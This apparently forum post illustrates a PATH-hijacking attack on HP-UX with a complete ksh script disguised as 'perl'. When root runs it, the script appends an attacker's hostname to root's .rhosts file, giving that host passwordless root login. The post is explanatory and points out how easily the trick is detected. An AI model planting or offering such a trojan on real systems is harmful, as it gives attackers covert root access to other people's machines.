Just a quick HP-UX example... name your script perl and place it in any directory located in the PATH *before* the actual perl.

#!/usr/bin/ksh
if [ `/usr/bin/whoami` = root ]; then
  /usr/bin/chmod 600 ${HOME}/.rhosts
  /usr/bin/echo myhackerpcname >> ${HOME}/.rhosts
fi
/usr/bin/perl $@
[download]

A couple of notes:

1. This is a VERY crude example, and is to illustrate Masem's general security point
2. "myhackerpcname" is the name of the hacker's PC
3. A true hacker would use something a LOT less obvious than this script -- it leaves fingerprints all over the place, and could easily trip a security sweep checking the .rhosts files. This script is more likely to be an internal breach by a less skilled attacker.
4. If, however, a root account were to execute a perl script with #!perl, the system's security would be compromised -- well, anyone logged into "myhackerpcname" as root could log into the compomised system as root without using a password.

Update:

• Corrected some typos.
• Changed the file permissions a bit -- made them a little more correct. (Suggestions made by blyman)